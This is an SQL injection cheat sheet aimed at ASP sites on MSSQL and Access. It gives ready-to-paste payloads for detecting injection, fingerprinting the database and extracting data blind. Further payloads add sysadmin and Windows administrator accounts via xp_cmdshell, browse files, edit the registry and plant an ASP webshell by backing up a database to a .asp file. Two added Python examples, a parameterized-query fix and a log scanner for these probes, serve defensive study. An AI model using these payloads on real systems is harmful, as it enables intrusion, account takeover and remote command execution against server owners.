1. Determine whether injection exists.
; and 1=1
; and 1=2
2. Determine whether it is MSSQL.
; and user>0
3. Determine the database system.
; and (select count(*) from sysobjects)>0    (MSSQL)
; and (select count(*) from msysobjects)>0   (Access)
4. The injected parameter is a string (character) type.
' and [query condition] and ''='
5. The search parameter is not filtered (LIKE wildcard; %25 is the URL-encoded %).
' and [query condition] and '%25'='
6. Guess the table name.
; and (select count(*) from [table name])>0
7. Guess the field name.
; and (select count(field name) from table name)>0
8. Guess the length of the value stored in the field.
; and (select top 1 len(field name) from table name)>0
9. (1) Get the ASCII value of a field, one character at a time (Access).
; and (select top 1 asc(mid(field name, 1, 1)) from table name)>0
(2) Get the Unicode value of a field, one character at a time (MSSQL).
; and (select top 1 unicode(substring(field name, 1, 1)) from table name)>0
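Steps 1 to 9 all depend on one defect: the id or keyword parameter is spliced into the SQL text, so a "true" probe and a "false" probe produce different responses. The following Python block is an added example, not part of this cheat sheet; it uses sqlite3 as an offline stand-in for the ASP/MSSQL page (sqlite_master stands in for sysobjects/msysobjects, and the articles table, its ids and titles are constructed) to show the vulnerable concatenation next to the parameterized form for both the numeric context (steps 1-3, 6-9) and the LIKE/string context (steps 4-5).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo table standing in for the page behind list.asp?id=."""
    db = sqlite3.connect(":memory:")
    db.execute("create table articles (id integer primary key, title text)")
    db.executemany("insert into articles values (?, ?)", [
        (66, "MSSQL cross-database query"),
        (222, "ASP injection vulnerabilities"),
        (309, "Squeeze the last drop of MS SQL"),
    ])
    return db


# --- the defect the cheat sheet relies on: user input spliced into the SQL text ---

def lookup_vulnerable(db, user_id: str):
    # Numeric context (steps 1-3, 6-9): "66 and 1=2" becomes part of the WHERE clause.
    sql = "select id, title from articles where id = " + user_id
    return db.execute(sql).fetchall()


def search_vulnerable(db, keyword: str):
    # String/LIKE context (steps 4-5): the closing quote in
    # "' and 1=1 and '%'='" escapes the literal and re-balances it at the end.
    sql = "select id, title from articles where title like '%" + keyword + "%'"
    return db.execute(sql).fetchall()


# --- the fix: bound parameters; the value is compared, never parsed as SQL ---

def lookup_parameterized(db, user_id: str):
    # sqlite applies the column's numeric affinity: "66" still matches id 66,
    # "66 and 1=1" cannot be converted and simply matches nothing.
    return db.execute("select id, title from articles where id = ?",
                      (user_id,)).fetchall()


def search_parameterized(db, keyword: str):
    # The wildcards are added to the bound value, not to the SQL text.
    return db.execute("select id, title from articles where title like ?",
                      ("%" + keyword + "%",)).fetchall()


def differential(query_fn, db, base: str, true_probe: str, false_probe: str) -> bool:
    """The signal step 1 looks for: do a 'true' and a 'false' probe produce
    different responses?  Any difference means the probe reached the SQL parser."""
    return query_fn(db, base + true_probe) != query_fn(db, base + false_probe)


if __name__ == "__main__":
    db = make_db()
    for name, fn in [("vulnerable", lookup_vulnerable), ("parameterized", lookup_parameterized)]:
        print(name, "id probe differential:",
              differential(fn, db, "66", " and 1=1", " and 1=2"))
    for name, fn in [("vulnerable", search_vulnerable), ("parameterized", search_parameterized)]:
        print(name, "search probe differential:",
              differential(fn, db, "", "' and 1=1 and '%'='", "' and 1=2 and '%'='"))
```

The parameterized versions return the same (empty) result for both probes, which is exactly what removes the signal every later step builds on. Note that sqlite3.execute refuses stacked statements, so the "; exec ..." forms used from step 11 onward cannot be reproduced here; on MSSQL the same concatenation defect admits them.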
10. Test the permission structure (MSSQL).
; and 1=(select is_srvrolemember('sysadmin'));--
; and 1=(select is_srvrolemember('serveradmin'));--
; and 1=(select is_srvrolemember('setupadmin'));--
; and 1=(select is_srvrolemember('securityadmin'));--
; and 1=(select is_srvrolemember('diskadmin'));--
; and 1=(select is_srvrolemember('bulkadmin'));--
; and 1=(select is_member('db_owner'));--
11. Add MSSQL and system accounts.
; exec master.dbo.sp_addlogin username;--
; exec master.dbo.sp_password null, password, username;--   (old password, new password, login)
; exec master.dbo.sp_addsrvrolemember username, sysadmin;--
; exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net user username password /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12. (1) Traverse the directory.
; create table dirs (paths varchar(100), id int)
; insert dirs exec master.dbo.xp_dirtree 'C:\'
; and (select top 1 paths from dirs)>0
; and (select top 1 paths from dirs where paths not in ('obtained paths'))>0
(2) Traverse directories (alternative).
; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
; insert temp exec master.dbo.xp_availablemedia;--   get all current drives
; insert into temp (id) exec master.dbo.xp_subdirs 'C:\';--   get the subdirectory list
; insert into temp (id, num1) exec master.dbo.xp_dirtree 'C:\';--   get the directory tree structure of all subdirectories
; insert into temp (id) exec master.dbo.xp_cmdshell 'type C:\web\index.asp';--   view the file content
13. MSSQL stored procedures (registry).
xp_regenumvalues root key, subkey
; exec xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run'   returns all values under the key, in multiple record sets
xp_regread root key, subkey, value name
; exec xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion', 'CommonFilesDir'   returns the value of the specified entry
xp_regwrite root key, subkey, value name, value type, value
There are two value types: REG_SZ and REG_DWORD.
; exec xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion', 'TestValueName', 'REG_SZ', 'Hello'   write to the registry
xp_regdeletevalue root key, subkey, value name
; exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion', 'TestValueName'   delete a value
xp_regdeletekey root key, subkey
; exec xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\TestKey'   delete the key, including all values under it
14. MSSQL backup creates a webshell.
use model
create table cmd (str image);
insert into cmd (str) values ('<% dim oscript %>');
backup database model to disk = 'C:\L.asp';
15. MSSQL built-in functions.
; and (select @@version)>0   get the version string (SQL Server build and Windows version)
; and user_name()='dbo'   determine whether the current connection is sa (sa maps to dbo)
; and (select user_name())>0   disclose the user of the current connection (through the type-conversion error)
; and (select db_name())>0   get the currently connected database
16. Simple webshell.
use model
create table cmd (str image);
insert into cmd (str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk = 'G:\wwwtest\L.asp';
When a request is sent, it is used as follows:
http://ip/L.asp?c=dir
Required tools: SQL Query Analyzer and sqlexec (sunx version).
1. To remove the xp_cmdshell extended procedure, use the following statement:
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and objectproperty(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2. To add the xp_cmdshell extended procedure, use the following statement:
(1) SQL Query Analyzer
sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'
(2) sqlexec (sunx version): first enter %s in the Format option, then enter the statement in the CMD option
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Remove:
sp_dropextendedproc 'xp_cmdshell'
(3) MSSQL 2000
sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
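Everything from step 10 onward, and the sp_addextendedproc / sp_dropextendedproc statements in this appendix, arrives through the same injectable parameter and therefore leaves a distinctive vocabulary in the web server's request log. The following Python block is an added example, not part of this cheat sheet: a small log scanner over constructed IIS W3C-style lines (the field layout, addresses, timestamps and requests are all made up) that normalizes the query string before matching (URL decoding repeated to peel the double encoding behind step 5's %25, lower-casing, and collapsing the "master. dbo. xp_cmdshell" spacing shown in steps 11-12), tags the probe patterns of steps 1-9 and the procedure names of steps 10-16 and this appendix, and pairs each client's "and 1=1" / "and 1=2" requests against the same script to surface the boolean-blind differential of step 1. Rule names and severities are this example's own.

```python
import re
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines for this example; fields are
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2003-05-01 10:22:31 10.0.0.5 GET /list.asp id=66 200
2003-05-01 10:22:40 10.0.0.5 GET /list.asp id=66;and+1=1 200
2003-05-01 10:22:41 10.0.0.5 GET /list.asp id=66;and+1=2 500
2003-05-01 10:22:55 10.0.0.5 GET /list.asp id=66;and+(select+count(*)+from+sysobjects)%3E0 200
2003-05-01 10:23:10 10.0.0.5 GET /search.asp kw=a'+and+1=1+and+'%25'=' 200
2003-05-01 10:23:30 10.0.0.5 GET /list.asp id=66;and+1=(select+is_srvrolemember('sysadmin'))-- 200
2003-05-01 10:24:02 10.0.0.5 GET /list.asp id=66;exec+master.+dbo.+xp_cmdshell+'dir' 200
2003-05-01 10:25:00 10.0.0.5 GET /list.asp id=66;exec+sp_addextendedproc+xp_cmdshell,'xplog70.dll' 200
2003-05-01 10:25:30 10.0.0.5 GET /list.asp id=66;backup+database+model+to+disk='c:/x.asp' 200
2003-05-01 10:26:00 192.168.1.9 GET /list.asp id=309 200
"""

# One rule per family of probe or procedure named in the cheat sheet (rule names are ours).
RULES = {
    "boolean_probe":  re.compile(r"\band\s+1\s*=\s*[12]\b"),                    # steps 1, 4, 5
    "db_fingerprint": re.compile(r"\b(user\s*>\s*0|from\s+m?sysobjects)\b"),    # steps 2, 3
    "char_inference": re.compile(r"\b(len|asc|unicode)\s*\("),                  # steps 8, 9
    "role_check":     re.compile(r"\bis_(srvrole)?member\s*\("),                # step 10
    "os_command":     re.compile(r"\bxp_cmdshell\b"),                           # steps 11, 12, appendix
    "account_change": re.compile(r"\bsp_(addlogin|password|addsrvrolemember)\b"),            # step 11
    "registry":       re.compile(r"\bxp_reg(read|write|enumvalues|deletevalue|deletekey)\b"),  # step 13
    "filesystem":     re.compile(r"\bxp_(dirtree|subdirs|availablemedia)\b"),   # step 12
    "backup_to_file": re.compile(r"\bbackup\s+database\s+\w+\s+to\s+disk\b"),  # steps 14, 16
    "extproc_change": re.compile(r"\bsp_(add|drop)extendedproc\b"),             # appendix
}
SEVERITY = {"boolean_probe": 1, "db_fingerprint": 2, "char_inference": 2, "role_check": 2,
            "filesystem": 2, "os_command": 3, "account_change": 3, "registry": 3,
            "backup_to_file": 3, "extproc_change": 3}

LOG_RE = re.compile(r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
                    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)$")


def normalize(query: str) -> str:
    """Decode until stable (catches %2527-style double encoding), lower-case,
    collapse whitespace and drop spaces around dots."""
    decoded = query
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = re.sub(r"\s+", " ", decoded.lower())
    return re.sub(r"\s*\.\s*", ".", decoded)   # 'master. dbo. x' -> 'master.dbo.x'


def scan_log(text: str):
    """Return one finding per log line whose decoded query matches any rule."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(raw)
        if not m:
            continue
        q = normalize(m["query"])
        cats = [name for name, rx in RULES.items() if rx.search(q)]
        if cats:
            hits.append({"line": lineno, "ip": m["ip"], "stem": m["stem"], "query": q,
                         "when": datetime.fromisoformat(m["date"] + " " + m["time"]),
                         "status": int(m["status"]), "cats": cats})
    return hits


def blind_pairs(hits, window_seconds=60):
    """(ip, stem, responses differed) for each 'and 1=1' request that the same
    client followed with 'and 1=2' against the same script: the step 1 differential."""
    probes = [h for h in hits if "boolean_probe" in h["cats"]]
    pairs = []
    for a in probes:
        if not re.search(r"\band 1 ?= ?1\b", a["query"]):
            continue
        for b in probes:
            if (b["ip"] == a["ip"] and b["stem"] == a["stem"]
                    and re.search(r"\band 1 ?= ?2\b", b["query"])
                    and abs((b["when"] - a["when"]).total_seconds()) <= window_seconds):
                pairs.append((a["ip"], a["stem"], a["status"] != b["status"]))
    return pairs


def worst_per_ip(hits):
    """Highest severity seen per client address."""
    worst = {}
    for h in hits:
        worst[h["ip"]] = max(worst.get(h["ip"], 0), max(SEVERITY[c] for c in h["cats"]))
    return worst


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["line"], h["ip"], h["status"], h["cats"], h["query"])
    print("blind pairs:", blind_pairs(found))
    print("worst per ip:", worst_per_ip(found))
```

Matching runs on the decoded, lower-cased query, so a rule written against the raw request string would miss the `master.+dbo.+xp_cmdshell` spacing and the encoded `%3E`; the 200/500 status split on the paired probes is the same signal the sheet's step 1 reads from the other side. These matches identify an attempt, not success; whether xp_cmdshell, the xp_reg* procedures and extended-procedure registration are reachable at all is decided on the server, which is why the appendix's drop statement matters as a mitigation and not only as a cleanup step.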